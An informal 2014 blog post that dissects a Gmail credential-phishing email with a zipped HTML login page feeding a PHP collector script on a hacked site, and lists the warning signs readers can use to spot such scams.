So the Phish Still Lives. I’d like to call it a 419 but this seems closer home reason being , choice of name :
MakOtieno Stephen <abbastephen13@g
How it was all meant to go down:
- Send the E-mail
- Get me to read and open an attachment that tells me to login to Gmail to read my transaction details
- Send my details to his remote php script then he gets mailed back home (to him) then redirect me to gmail regularly.
- My Bank gives doesn’t use Gmail
- Attachments don’t come as ZIP
- This particular mailing address was not the one they mail to.
Well nothing much to say about the phish its all about get the attention. The email was almost perfect for a Non-IT guy.
The attachment is a zip file comes nicely on Gmail. now before we open the zip file it’s important to ask:
- Would your bank attach statements like that ?
- The zip file contains a HTML file surely does your bank do that?
- Your bank with all it’s technological investment would send you a statement from a Gmail account rather than a company account, is that even realistic?
- Is this the email you signed up to internet banking with?
Well oh well . Flags get them caught.
Let’s check the con doesn’t hurt.
Opening up the zip and HTML we see the wonders , a Gmail Phishing page , not surprised. Let’s also find where it phones after Phishing.
So on checking the site a bit. I notice omowo.php receives the login details filled then redirects to gmail. To avoid the current sessions facing that seeing its a classic phish. Did the check under a proxy. No sessions there. Here is the long and short of what it ended up getting a blank form. The site was hacked before this phishing recepient page was uploaded there.
Hopefully now you can catch a phish before a phisherman get’s the credentials. As we close 2014. Don’t get Phished. If you have been phished and have a recovery method recover your account and change your password then be careful of what comes in.
The actual Phishing page can be downloaded here for researchers:
With Your Gmail an attacker can control your android device(s), even erase them , still think this is harmless?